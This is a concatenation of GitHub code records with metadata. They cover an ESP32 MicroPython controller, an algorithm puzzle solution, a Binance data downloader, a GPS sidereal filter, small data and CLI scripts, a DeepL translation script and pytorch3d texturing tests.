#根据电平设置app按键的图标\n if(p2.value()):\n button1.icon(\"fad fa-siren\")\n button1.text(\"Turn ON\") \n else:\n button1.icon(\"fad fa-siren-on\")\n button1.text(\"Turn OFF\")\n \n\ndef rgb1_callback(r_value, g_value, b_value, bright_value):\n \"\"\"根据RGB组件返回值设置R/G/B占空比\"\"\"\n \"\"\"无亮度情况\"\"\"\n #pwm_led_r.duty(1023 - int(r_value / 255 * 1023))\n #pwm_led_g.duty(1023 - int(g_value / 255 * 1023))\n #pwm_led_b.duty(1023 - int(b_value / 255 * 1023)) \n \"\"\"有亮度情况\"\"\"\n pwm_led_r.duty(1023 - int(r_value * bright_value* 1023 / 65025 ))\n pwm_led_g.duty(1023 - int(g_value * bright_value* 1023 / 65025 ))\n pwm_led_b.duty(1023 - int(b_value * bright_value* 
1023 / 65025 ))\n \n\n#定时器0回调函数\ndef mycallback(callback_timer):\n \"\"\"\"实现Oled屏本地实时显示时间/温度/湿度信息\"\"\"\n oled.fill(0)\n #dht22测量一次\n dht.measure()\n temp_read = dht.temperature()\t#读取温度\n humi_read = dht.humidity()\t\t#读取湿度\n try:\n ntptime.settime()\n except:\n pass\n time_tex = time.localtime()\n time_tex = '%d-%d-%d %d:%02d'%(time_tex[0],time_tex[1],time_tex[2],time_tex[3],time_tex[4])\n #时间+温度+湿度\n t_tex = \"T:\"+str(temp_read)+\"C\"\n h_tex = \"H:\"+str(humi_read)[:4]+'%'\n #oled显示时间+温度+湿度\n oled.text(time_tex,0,6)\n oled.text(t_tex, 40, 16)\n oled.text(h_tex, 40, 26)\n oled.show()\t\t\t#OLED显示\n \n\n\nif __name__ == '__main__':\n #注册回调函数,当有设备收到APP发来的数据时会调用对应的回调函数\n rgb1.attach(rgb1_callback)\n button1.attach(button1_callback)\n Blinker.attachHeartbeat(heartbeat_callback)\n \n tim0 = Timer(0)\n tim0.init(period=60000, mode=Timer.PERIODIC, callback=mycallback) #周期为1分钟,无限执行。\n while True:\n Blinker.run()\n \n \n\n\n\n\n\n\n\n","repo_name":"xlft/Esp32_mpyBlinker_example","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17154066535","text":"N, L = map(int,input().split())\nworld= []\nfor i in range(N):\n world.append(list(map(int,input().split())))\ndef slide(way):\n for j in range(1,N):\n if abs(way[j] - way[j-1]) > 1:\n return False\n if way[j] - way[j-1] == 1:\n for k in range(1,L+1):\n if (j-k) < 0 or way[j-1] != way[j-k] or used[j-k]:\n return False\n if way[j-1] == way[j-k]:\n used[j-k] = True\n elif way[j] - way[j-1] == -1:\n for k in range(1,L+1):\n if (j+k) > N or way[j] != way[j+k-1] or used[j+k-1]:\n return False \n if way[j] == way[j+k-1]:\n used[j+k-1] = True\n return True\n\nans = 0\nfor i in range(N):\n used = [False] * N \n if slide([world[i][j] for j in range(N)]):\n ans +=1\nfor i in range(N):\n used = [False] * N\n if slide([world[j][i] for j in range(N)]):\n ans += 1\nprint(ans)\n \n\n\n\n\n","repo_name":"da2inee/Algorithm","sub_path":"Implementation/BOJ14890경사로.py","file_name":"BOJ14890경사로.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18613854281","text":"import requests\nimport zipfile\nimport os\n# https://data.binance.vision/data/spot/daily/klines/BTCBUSD/1m/BTCBUSD-1m-2023-01-30.zip\nurl_template = \"https://data.binance.vision/data/spot/daily/klines/BTCBUSD/1h/BTCBUSD-1m-{}-{:02d}-{:02d}.zip\"\n\n# Define the date range for which to download the zip files\nstart_year = 2021\nstart_month = 3\nstart_day = 1\nend_year = 2022\nend_month = 12\nend_day = 31\n\n# Loop through the date range to download the zip files\nfor year in range(start_year, end_year + 1):\n for month in range(start_month, end_month + 1):\n for day in range(start_day, end_day + 1):\n date = f\"{year}-{month}-{day}\"\n url = url_template.format(year, month, day)\n print(url)\n response = requests.get(url)\n if response.status_code == 200:\n # Save the zip file to the current directory\n with open(f\"BTCBUSD-1m-{date}.zip\", \"wb\") as f:\n f.write(response.content)\n # Extract the contents of the zip file\n with zipfile.ZipFile(f\"BTCBUSD-1m-{date}.zip\", \"r\") as z:\n z.extractall()\n # Delete the zip file after extraction\n os.remove(f\"BTCBUSD-1m-{date}.zip\")\n print(f\"Successfully downloaded and extracted BTCBUSD-1m-{date}.zip\")\n else:\n print(f\"Unable to download BTCBUSD-1m-{date}.zip, status code: 
{response.status_code}\")\n","repo_name":"markjconnolly/precision_crypto","sub_path":"code/scrape_BTC.py","file_name":"scrape_BTC.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20892499420","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport scipy.stats as stats\nimport scipy.signal as signal\nimport datetime as datetime\nimport matplotlib.pyplot as plt\nimport obspy.signal.cross_correlation as xcorr\n\ndef filter(date, time, north, east, up, eq, showme=False):\n \"\"\"\n @author: Cedric Twardzik\n @contact: cedric.twardz(at)gmail.com\n @inputs: date [type datetime]: dates of the positions\n time [type float]: times of the positions (s)\n north [type float]: position in the north component\n east [type float]: position in the east component\n up [type float]: position in the vertical component\n eq [type datetime]: date of the mainshock \n showme [type logical]: show the stacks and the filter \n \"\"\"\n\n # Find the sampling interval\n dt = time[1] - time[0]\n\n # Remove the coseismic offset\n ib = date < eq\n ia = date > eq\n offset_n = north[ia][0] - north[ib][-1]\n offset_e = east [ia][0] - east [ib][-1]\n offset_u = up [ia][0] - up [ib][-1]\n north[ia] -= offset_n\n east [ia] -= offset_e\n up [ia] -= offset_u\n\n # Create the full time series\n full_time = np.arange(time[0], time[-1]+dt, dt)\n full_date = np.array([date[0] + datetime.timedelta(seconds=i*dt) for i in range(full_time.size)])\n full_north = np.full(full_time.size, np.nan)\n full_east = np.full(full_time.size, np.nan)\n full_up = np.full(full_time.size, np.nan)\n ij, i, j = np.intersect1d(time, full_time, assume_unique=True, return_indices=True)\n full_north[j] = north[i]\n full_east [j] = east [i]\n full_up [j] = up [i]\n\n # Sidereal day (Choi et al. 
2004)\n sidereal_shift = datetime.datetime(2000, 1, 2, 0, 0, 0) - datetime.datetime(2000, 1, 1, 23, 56, 4, 0)\n sidereal_shift = np.int(sidereal_shift.total_seconds()/dt + 0.5001)\n\n # Maximum sidereal shift allowed\n ndays = (full_date[-1] - full_date[0]).days\n sidereal_shift *= (ndays*4)\n\n # Remove the gaps in the time series using simple linear interpolation\n nans = np.isnan(full_north)\n full_north[nans] = np.interp(full_time[nans], full_time[~nans], full_north[~nans])\n full_east [nans] = np.interp(full_time[nans], full_time[~nans], full_east [~nans])\n full_up [nans] = np.interp(full_time[nans], full_time[~nans], full_up [~nans])\n\n # Extract the first day\n tstart = full_date[0]\n tstop = full_date[0] + datetime.timedelta(days=1)\n index = (tstart <= full_date) & (full_date < tstop)\n stack_north = full_north[index] * full_north[index].std()\n stack_east = full_east [index] * full_east [index].std()\n stack_up = full_up [index] * full_up [index].std()\n stack_time = full_time [index]\n stack_size = stack_time.size\n ntrace_north = full_north[index].std()\n ntrace_east = full_east [index].std()\n ntrace_up = full_up [index].std()\n \n # Show the stacks\n if showme:\n plt.close()\n fig, ax = plt.subplots(3, 1, sharex='col')\n ax[0].plot(stack_time, stack_north/ntrace_north, 'k-', lw=1.0, alpha=0.5)\n ax[1].plot(stack_time, stack_east /ntrace_east , 'k-', lw=1.0, alpha=0.5)\n ax[2].plot(stack_time, stack_up /ntrace_up , 'k-', lw=1.0, alpha=0.5)\n\n # Initialize the day counter\n iday = 1\n\n # Stack the days before the earthquake\n while True:\n\n # Extract the following day\n tstart = tstop\n tstop = tstart + datetime.timedelta(days=1)\n index = (tstart-datetime.timedelta(hours=1.0) <= full_date) & (full_date < tstop+datetime.timedelta(hours=1.0))\n i0 = np.int(3600.0/dt + 0.5001)\n\n # Ensure that we are not getting any data from after the mainchock\n if np.any(full_date[index] >= eq): break\n\n # Select the relevant data\n n = full_north[index]\n e = full_east [index]\n u = full_up [index]\n\n # Cross-correlation between the current day and the stack (position)\n #cc_north = xcorr.correlate(stack_north/ntrace_north, n, stack_size)\n #cc_east = xcorr.correlate(stack_east /ntrace_east , e, stack_size)\n #cc_up = xcorr.correlate(stack_up /ntrace_up , u, stack_size)\n\n # Cross-correlation between the current day and the stack (velocity)\n cc_north = xcorr.correlate(np.diff(stack_north/ntrace_north), np.diff(n), stack_size-1)\n cc_east = xcorr.correlate(np.diff(stack_east /ntrace_east ), np.diff(e), stack_size-1)\n cc_up = xcorr.correlate(np.diff(stack_up /ntrace_up ), np.diff(u), stack_size-1)\n\n # Find the optimal shift to maximize the cross-correlation\n shift_north, ccmax_north = xcorr.xcorr_max(cc_north, abs_max=False)\n shift_east , ccmax_east = xcorr.xcorr_max(cc_east , abs_max=False)\n shift_up , ccmax_up = xcorr.xcorr_max(cc_up , abs_max=False)\n\n # Show the stacks\n if showme:\n ax[0].plot(stack_time, n[i0-shift_north:i0+stack_size-shift_north], 'k-', lw=1.0, alpha=0.5)\n ax[1].plot(stack_time, e[i0-shift_east :i0+stack_size-shift_east ], 'k-', lw=1.0, alpha=0.5)\n ax[2].plot(stack_time, u[i0-shift_up :i0+stack_size-shift_up ], 'k-', lw=1.0, alpha=0.5)\n\n # Add the trace to the stack\n stack_north += n[i0-shift_north:i0+stack_size-shift_north] * n[i0-shift_north:i0+stack_size-shift_north].std()\n stack_east += e[i0-shift_east :i0+stack_size-shift_east ] * e[i0-shift_east :i0+stack_size-shift_east ].std()\n stack_up += u[i0-shift_up :i0+stack_size-shift_up ] * 
u[i0-shift_up :i0+stack_size-shift_up ].std()\n\n # Update the normalization factor\n ntrace_north += n[i0-shift_north:i0+stack_size-shift_north].std()\n ntrace_east += e[i0-shift_east :i0+stack_size-shift_east ].std()\n ntrace_up += u[i0-shift_up :i0+stack_size-shift_up ].std()\n\n # Update the day counter\n iday += 1\n\n # Normalize the final stack\n stack_north /= ntrace_north\n stack_east /= ntrace_east\n stack_up /= ntrace_up\n \n # Show the final stack\n if showme:\n ax[0].plot(stack_time, stack_north, 'r-', lw=2.0, alpha=0.9)\n ax[1].plot(stack_time, stack_east , 'r-', lw=2.0, alpha=0.9)\n ax[2].plot(stack_time, stack_up , 'r-', lw=2.0, alpha=0.9)\n plt.show()\n\n # Initialize the sidereal filter\n filter_date = full_date.copy()\n filter_time = full_time.copy()\n filter_north = np.full(filter_time.size, np.nan)\n filter_east = np.full(filter_time.size, np.nan)\n filter_up = np.full(filter_time.size, np.nan)\n\n # Initialize the day counter\n iday = 0\n\n # Build the sidereal filter\n while True:\n\n # Extract the relevant dates\n tstart = full_date[0] + datetime.timedelta(days=iday)\n tstop = full_date[0] + datetime.timedelta(days=iday+1)\n index = (tstart <= full_date) & (full_date < tstop)\n\n # Ensure we have a full date\n if index.sum() != 2880: break\n\n # Remove the log-trend before cross-correlation\n n = full_north[index]\n e = full_east [index]\n u = full_up [index]\n\n # Cross-correlation between the current day and the stack (position)\n #cc_north = xcorr.correlate(stack_north, n, stack_size)\n #cc_east = xcorr.correlate(stack_east , e, stack_size)\n #cc_up = xcorr.correlate(stack_up , u, stack_size)\n\n # Cross-correlation between the current day and the stack (velocity)\n cc_north = xcorr.correlate(np.diff(stack_north), np.diff(n), stack_size-1)\n cc_east = xcorr.correlate(np.diff(stack_east ), np.diff(e), stack_size-1)\n cc_up = xcorr.correlate(np.diff(stack_up ), np.diff(u), stack_size-1)\n\n # Find the optimal shift to maximize the cross-correlation\n shift_north, ccmax_north = xcorr.xcorr_max(cc_north, abs_max=False)\n shift_east , ccmax_east = xcorr.xcorr_max(cc_east , abs_max=False)\n shift_up , ccmax_up = xcorr.xcorr_max(cc_up , abs_max=False)\n\n # Insert the stack\n filter_north[index] = np.roll(stack_north * signal.tukey(stack_size, 0.05), -shift_north)\n filter_east [index] = np.roll(stack_east * signal.tukey(stack_size, 0.05), -shift_east )\n filter_up [index] = np.roll(stack_up * signal.tukey(stack_size, 0.05), -shift_up )\n\n # Update the day counter\n iday += 1\n\n # Remove the mean of the filter\n filter_north -= np.nanmean(filter_north)\n filter_east -= np.nanmean(filter_east )\n filter_up -= np.nanmean(filter_up )\n \n # Remove the sidereal filter\n full_north -= filter_north\n full_east -= filter_east\n full_up -= filter_up\n\n # Get the relevant part of the filter\n ij, i, j = np.intersect1d(time, full_time, assume_unique=True, return_indices=True)\n north[i] = full_north[j]\n east [i] = full_east [j]\n up [i] = full_up [j]\n\n # Add the coseismic offset\n north[ia] += offset_n\n east [ia] += offset_e\n up [ia] += offset_u\n\n # All done\n return north, east, up\n","repo_name":"cedrictwardz/SiderealFilter","sub_path":"sidereal.py","file_name":"sidereal.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"21264744451","text":"import openpyxl\nimport random\nfrom openpyxl import Workbook, load_workbook\nimport glob\nimport json\n\n\ndef 
D3_wellness_dialog_for_autoregressive():\n folder_path = \"./TK_data/TT_data\"\n output_path = \"./TK_data/T0_data/T0_data.txt\"\n\n output_file = open(output_path, 'w', encoding='utf-8')\n #output_file.close()\n #output_file = open(output_path, 'a', encoding='utf-8')\n\n\n\n for file_path in glob.glob(folder_path + \"/*.txt\"):\n print(\"\\n\\n\\n {} \\n\\n\\n\".format(file_path))\n file = open(file_path, 'r', encoding='utf-8')\n ques_lines = file.readline()\n while True:\n answ_lines = file.readline()\n if not answ_lines:\n break\n #print(\"\\nTK:{}\\n\".format(ques_lines[:-1]))\n #print(\"\\nTK:{}\\n\".format(answ_lines[:-1]))\n output_file.write(ques_lines[:-1] + \" \" + answ_lines[:-1] + \"\\n\")\n ques_lines = answ_lines \n \n file.close()\n output_file.write(\"\\n\")\n\n output_file.close()\n\n\n\nif __name__ == \"__main__\":\n D3_wellness_dialog_for_autoregressive()\n","repo_name":"tk1star2/tk_kogpt2_memorable","sub_path":"STEP1_data_generation_T0.py","file_name":"STEP1_data_generation_T0.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31555116101","text":"\"\"\"\nSub command to show datetime from saved timezones.\n\"\"\"\nimport sys\nfrom typing import List, Union\n\nimport click\n\nfrom timezones_cli.utils import check_config as check_configuration\nfrom timezones_cli.utils import console, get_local_time, get_system_time\n\n\n@click.command()\n@click.option(\n \"--toggle\",\n \"-t\",\n help=\"Toggle for 24 hours format\",\n type=bool,\n default=False,\n is_flag=True,\n)\ndef show(toggle: bool):\n \"\"\"\n Show time based on the defaults at .tz-cli file.\n\n $ tz show\n \"\"\"\n check_config: Union[List, bool] = check_configuration()\n\n if not check_config:\n console.print(\n \"File is empty or No configuration file is present in your system.:x:\\n\",\n style=\"bold red\",\n )\n console.print(\n \"Use `tz add` to create and add timezone to your config file.:memo:\\n\",\n style=\"bold green\",\n )\n\n console.print(\n f\"Your system datetime is: {get_system_time()}\",\n style=\"bold yellow\",\n )\n sys.exit()\n\n return get_local_time(check_config, toggle=toggle)\n","repo_name":"yankeexe/timezones-cli","sub_path":"timezones_cli/commands/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"48"} +{"seq_id":"10233030098","text":"import unittest\nimport torch\nimport torch.nn.functional as F\n\nfrom pytorch3d.renderer.mesh.rasterizer import Fragments\nfrom pytorch3d.renderer.mesh.texturing import (\n _clip_barycentric_coordinates,\n interpolate_face_attributes,\n interpolate_texture_map,\n interpolate_vertex_colors,\n)\nfrom pytorch3d.structures import Meshes, Textures\n\nfrom common_testing import TestCaseMixin\nfrom test_meshes import TestMeshes\n\n\nclass TestTexturing(TestCaseMixin, unittest.TestCase):\n def test_interpolate_attributes(self):\n \"\"\"\n This tests both interpolate_vertex_colors as well as\n interpolate_face_attributes.\n \"\"\"\n verts = torch.randn((4, 3), dtype=torch.float32)\n faces = torch.tensor([[2, 1, 0], [3, 1, 0]], dtype=torch.int64)\n vert_tex = torch.tensor(\n [[0, 1, 0], [0, 1, 1], [1, 1, 0], [1, 1, 1]], dtype=torch.float32\n )\n tex = Textures(verts_rgb=vert_tex[None, :])\n mesh = Meshes(verts=[verts], faces=[faces], textures=tex)\n pix_to_face = torch.tensor([0, 1], dtype=torch.int64).view(1, 1, 1, 2)\n barycentric_coords = 
torch.tensor(\n [[0.5, 0.3, 0.2], [0.3, 0.6, 0.1]], dtype=torch.float32\n ).view(1, 1, 1, 2, -1)\n expected_vals = torch.tensor(\n [[0.5, 1.0, 0.3], [0.3, 1.0, 0.9]], dtype=torch.float32\n ).view(1, 1, 1, 2, -1)\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=barycentric_coords,\n zbuf=torch.ones_like(pix_to_face),\n dists=torch.ones_like(pix_to_face),\n )\n texels = interpolate_vertex_colors(fragments, mesh)\n self.assertTrue(torch.allclose(texels, expected_vals[None, :]))\n\n def test_interpolate_attributes_grad(self):\n verts = torch.randn((4, 3), dtype=torch.float32)\n faces = torch.tensor([[2, 1, 0], [3, 1, 0]], dtype=torch.int64)\n vert_tex = torch.tensor(\n [[0, 1, 0], [0, 1, 1], [1, 1, 0], [1, 1, 1]],\n dtype=torch.float32,\n requires_grad=True,\n )\n tex = Textures(verts_rgb=vert_tex[None, :])\n mesh = Meshes(verts=[verts], faces=[faces], textures=tex)\n pix_to_face = torch.tensor([0, 1], dtype=torch.int64).view(1, 1, 1, 2)\n barycentric_coords = torch.tensor(\n [[0.5, 0.3, 0.2], [0.3, 0.6, 0.1]], dtype=torch.float32\n ).view(1, 1, 1, 2, -1)\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=barycentric_coords,\n zbuf=torch.ones_like(pix_to_face),\n dists=torch.ones_like(pix_to_face),\n )\n grad_vert_tex = torch.tensor(\n [\n [0.3, 0.3, 0.3],\n [0.9, 0.9, 0.9],\n [0.5, 0.5, 0.5],\n [0.3, 0.3, 0.3],\n ],\n dtype=torch.float32,\n )\n texels = interpolate_vertex_colors(fragments, mesh)\n texels.sum().backward()\n self.assertTrue(hasattr(vert_tex, \"grad\"))\n self.assertTrue(torch.allclose(vert_tex.grad, grad_vert_tex[None, :]))\n\n def test_interpolate_face_attributes_fail(self):\n # 1. A face can only have 3 verts\n # i.e. face_attributes must have shape (F, 3, D)\n face_attributes = torch.ones(1, 4, 3)\n pix_to_face = torch.ones((1, 1, 1, 1))\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=pix_to_face[..., None].expand(-1, -1, -1, -1, 3),\n zbuf=pix_to_face,\n dists=pix_to_face,\n )\n with self.assertRaises(ValueError):\n interpolate_face_attributes(fragments, face_attributes)\n\n # 2. 
pix_to_face must have shape (N, H, W, K)\n pix_to_face = torch.ones((1, 1, 1, 1, 3))\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=pix_to_face,\n zbuf=pix_to_face,\n dists=pix_to_face,\n )\n with self.assertRaises(ValueError):\n interpolate_face_attributes(fragments, face_attributes)\n\n def test_interpolate_texture_map(self):\n barycentric_coords = torch.tensor(\n [[0.5, 0.3, 0.2], [0.3, 0.6, 0.1]], dtype=torch.float32\n ).view(1, 1, 1, 2, -1)\n dummy_verts = torch.zeros(4, 3)\n vert_uvs = torch.tensor(\n [[1, 0], [0, 1], [1, 1], [0, 0]], dtype=torch.float32\n )\n face_uvs = torch.tensor([[0, 1, 2], [1, 2, 3]], dtype=torch.int64)\n interpolated_uvs = torch.tensor(\n [[0.5 + 0.2, 0.3 + 0.2], [0.6, 0.3 + 0.6]], dtype=torch.float32\n )\n\n # Create a dummy texture map\n H = 2\n W = 2\n x = torch.linspace(0, 1, W).view(1, W).expand(H, W)\n y = torch.linspace(0, 1, H).view(H, 1).expand(H, W)\n tex_map = torch.stack([x, y], dim=2).view(1, H, W, 2)\n pix_to_face = torch.tensor([0, 1], dtype=torch.int64).view(1, 1, 1, 2)\n fragments = Fragments(\n pix_to_face=pix_to_face,\n bary_coords=barycentric_coords,\n zbuf=pix_to_face,\n dists=pix_to_face,\n )\n tex = Textures(\n maps=tex_map,\n faces_uvs=face_uvs[None, ...],\n verts_uvs=vert_uvs[None, ...],\n )\n meshes = Meshes(verts=[dummy_verts], faces=[face_uvs], textures=tex)\n texels = interpolate_texture_map(fragments, meshes)\n\n # Expected output\n pixel_uvs = interpolated_uvs * 2.0 - 1.0\n pixel_uvs = pixel_uvs.view(2, 1, 1, 2)\n tex_map = torch.flip(tex_map, [1])\n tex_map = tex_map.permute(0, 3, 1, 2)\n tex_map = torch.cat([tex_map, tex_map], dim=0)\n expected_out = F.grid_sample(tex_map, pixel_uvs, align_corners=False)\n self.assertTrue(\n torch.allclose(texels.squeeze(), expected_out.squeeze())\n )\n\n def test_clone(self):\n V = 20\n tex = Textures(\n maps=torch.ones((5, 16, 16, 3)),\n faces_uvs=torch.randint(size=(5, 10, 3), low=0, high=V),\n verts_uvs=torch.ones((5, V, 2)),\n )\n tex_cloned = tex.clone()\n self.assertSeparate(tex._faces_uvs_padded, tex_cloned._faces_uvs_padded)\n self.assertSeparate(tex._verts_uvs_padded, tex_cloned._verts_uvs_padded)\n self.assertSeparate(tex._maps_padded, tex_cloned._maps_padded)\n\n def test_to(self):\n V = 20\n tex = Textures(\n maps=torch.ones((5, 16, 16, 3)),\n faces_uvs=torch.randint(size=(5, 10, 3), low=0, high=V),\n verts_uvs=torch.ones((5, V, 2)),\n )\n device = torch.device(\"cuda:0\")\n tex = tex.to(device)\n self.assertTrue(tex._faces_uvs_padded.device == device)\n self.assertTrue(tex._verts_uvs_padded.device == device)\n self.assertTrue(tex._maps_padded.device == device)\n\n def test_extend(self):\n B = 10\n mesh = TestMeshes.init_mesh(B, 30, 50)\n V = mesh._V\n F = mesh._F\n tex = Textures(\n maps=torch.randn((B, 16, 16, 3)),\n faces_uvs=torch.randint(size=(B, F, 3), low=0, high=V),\n verts_uvs=torch.randn((B, V, 2)),\n )\n tex_mesh = Meshes(\n verts=mesh.verts_padded(), faces=mesh.faces_padded(), textures=tex\n )\n N = 20\n new_mesh = tex_mesh.extend(N)\n\n self.assertEqual(len(tex_mesh) * N, len(new_mesh))\n\n tex_init = tex_mesh.textures\n new_tex = new_mesh.textures\n\n for i in range(len(tex_mesh)):\n for n in range(N):\n self.assertClose(\n tex_init.faces_uvs_list()[i],\n new_tex.faces_uvs_list()[i * N + n],\n )\n self.assertClose(\n tex_init.verts_uvs_list()[i],\n new_tex.verts_uvs_list()[i * N + n],\n )\n self.assertAllSeparate(\n [\n tex_init.faces_uvs_padded(),\n new_tex.faces_uvs_padded(),\n tex_init.verts_uvs_padded(),\n new_tex.verts_uvs_padded(),\n 
tex_init.maps_padded(),\n new_tex.maps_padded(),\n ]\n )\n with self.assertRaises(ValueError):\n tex_mesh.extend(N=-1)\n\n def test_clip_barycentric_coords(self):\n barycentric_coords = torch.tensor(\n [[1.5, -0.3, -0.2], [1.2, 0.3, -0.5]], dtype=torch.float32\n )\n expected_out = torch.tensor(\n [[1.0, 0.0, 0.0], [1.0 / 1.3, 0.3 / 1.3, 0.0]], dtype=torch.float32\n )\n clipped = _clip_barycentric_coordinates(barycentric_coords)\n self.assertTrue(torch.allclose(clipped, expected_out))\n# Helpful comments below.# Helpful comments below.# Helpful comments below.# Helpful comments below.# Helpful comments below.","repo_name":"Lynn-Vang42/demo-data","sub_path":"test_texturing.py","file_name":"test_texturing.py","file_ext":"py","file_size_in_byte":8793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34214439423","text":"#!/usr/bin/env python3\n\nimport psycopg2 as pg\nimport psycopg2.extras\n\nconn = pg.connect(database='france')\n\ncur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n# Query as a string\nquery = \"SELECT name, code FROM regions ORDER BY name ASC\"\n\n# Execute the query\ncur.execute(query)\n\n# Can see the number of rows returned\nprint(\"number of regions: %s\" % cur.rowcount)\n\n# Loop over each row\nfor row in cur.fetchall():\n\n # Access by column name in dict\n print(\"%s [%s]\" % (row['name'], row['code']))\n\n# prompt for region code\nregion_code = input(\"Enter region code: \")\n\n# look for departments in the region\nquery = \"select departments.code as department_code, departments.name as department_name, count(towns.name) as n_towns from departments join towns on towns.department=departments.code where departments.region LIKE %(region_code)s group by departments.name, departments.code ORDER BY departments.name ASC\"\nparameters = { 'region_code': region_code }\ncur.execute(query, parameters )\n\nprint(\"number of departments: %s\" % cur.rowcount)\n\nfor row in cur.fetchall():\n print('%s. 
%s [%s]' % (row['department_code'], row['department_name'], row['n_towns']))\n\n# Close the cursor and connection\ncur.close()\nconn.close()\n","repo_name":"peadargrant/data_architecture","sub_path":"t10_connectivity/.sln/connectivity_solution.py","file_name":"connectivity_solution.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3960219095","text":"from pathlib import Path\nimport glob\nimport pandas as pd\nimport os\nimport sys\nimport xml.etree.ElementTree as ET\nimport datetime\nimport requests\n\n#-------------------------------------------\n#begin\n#-------------------------------------------\nprint('\\n')\nprint('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\nprint(__file__)\nprint(datetime.datetime.now())\nprint()\n\n#-------------------------------------------\n#初期設定\n#-------------------------------------------\nHOME_DIR_NAME = 'CATPEC'\nINPUT_FILE_PREFIX = 'remove_garbage_all_subset_'\nINPUT_FILE_SUFFIX = '.csv'\nOUTPUT_FILE_PREFIX = 'summaraized_all_subset_'\nOUTPUT_FILE_SUFFIX = '.csv'\nOUTPUT_ENCODING = 'UTF-8'\n\n#-------------------------------------------\n#関数\n#-------------------------------------------\ndef get_home_dir(dir_name):\n path = Path(os.path.dirname(__file__))\n _index = 0\n while True:\n if path.parents[_index].name == dir_name:\n home_dir = path.parents[_index]\n break\n _index += 1\n return home_dir\n\ndef select_file(path_regex):\n input_files = glob.glob(path_regex)\n\n if len(input_files) == 0:\n print('error:output file can not found.')\n return ''\n\n elif len(input_files) == 1:\n return input_files[0]\n\n else:\n for _index, output_file in enumerate(input_files):\n print(_index, output_file)\n val = input('select:')\n try: int(val)\n except ValueError:\n print('error:false input.')\n sys.exit()\n else: val = int(val)\n \n if val >= 0 and val <= len(input_files) - 1:\n return input_files[val]\n\n#-------------------------------------------\n#パス設定\n#-------------------------------------------\nhome_dir = get_home_dir(HOME_DIR_NAME)\ndata_dir = home_dir.joinpath('data')\ntools_dir = home_dir.joinpath('tools')\ninput_dir = data_dir.joinpath('intermediate')\noutput_dir = data_dir.joinpath('intermediate')\n\n#-------------------------------------------\n#csvの読み込み\n#-------------------------------------------\ninput_file_regex = INPUT_FILE_PREFIX + '*' + INPUT_FILE_SUFFIX\ninput_path_regex = str(input_dir.joinpath(input_file_regex))\ninput_path = select_file(input_path_regex)\n\nif input_path == '':\n print('error :[', input_path_regex, '] is no match.')\n sys.exit()\n\ndf = pd.read_csv(input_path, dtype=str, index_col=0)\nprint('input file :', input_path)\nprint(df)\n\n#-------------------------------------------\n#translation by deepl\n#-------------------------------------------\ntext_list = df['Prerequisite'].values.tolist()\ntext_list = ['' if pd.isna(x) else x for x in text_list]\nprint(text_list)\n\n#text_list = text_list[300:310]\n#print(text_list)\n\napi_key = input('input API-KEY : ')\nsource_lang = 'EN'\ntarget_lang = 'JA'\n\nparams = {\n 'auth_key' : api_key,\n 'text' : text_list,\n 'source_lang' : source_lang,\n \"target_lang\": target_lang\n }\n\nrequest = requests.post(\"https://api-free.deepl.com/v2/translate\", data=params)\nresult = request.json()\n\ntext_list_ja = []\nfor text_ja in result['translations']:\n 
text_list_ja.append(text_ja['text'])\n\nprint(text_list_ja)\n\ndf['Prerequisite_JA'] = text_list_ja\nprint(df)\n\n#-------------------------------------------\n#結果出力\n#-------------------------------------------\nnow = datetime.datetime.now()\noutput_file_name = OUTPUT_FILE_PREFIX + now.strftime('%Y%m%d_%H%M%S' + OUTPUT_FILE_SUFFIX)\noutput_path = os.path.join(output_dir, output_file_name)\ndf.to_csv(output_path)\n\n#-------------------------------------------\n#end\n#-------------------------------------------\nprint()\nprint(datetime.datetime.now())\nprint(__file__)\nprint('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\nprint('\\n')\n","repo_name":"RATTATAlab/CATPEC","sub_path":"src/8_summaraize.py","file_name":"8_summaraize.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72258987347","text":"\n#Lily Steinberg\n\n#I affirm that I have carried out the attached academic endeavors with full academic honesty,\n#in accordance with the Union College Honor Code and the course syllabus.\n\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nfrom StringIO import StringIO\nimport csv\nfrom datetime import date, datetime\n\n#PART 1\n#creates a sample file to test code with\ndef take_sample (filename, sampleSize):\n i = 0\n oldFile = open(filename, 'r')\n newFile = open('newFile.txt', 'w')\n for line in oldFile:\n if i%sampleSize==0:\n newFile.write(line)\n i+=1\n\n#PART2\n# returns a dictionary that maps dates to donations for\n# a given candidate from a given CSV fle\ndef 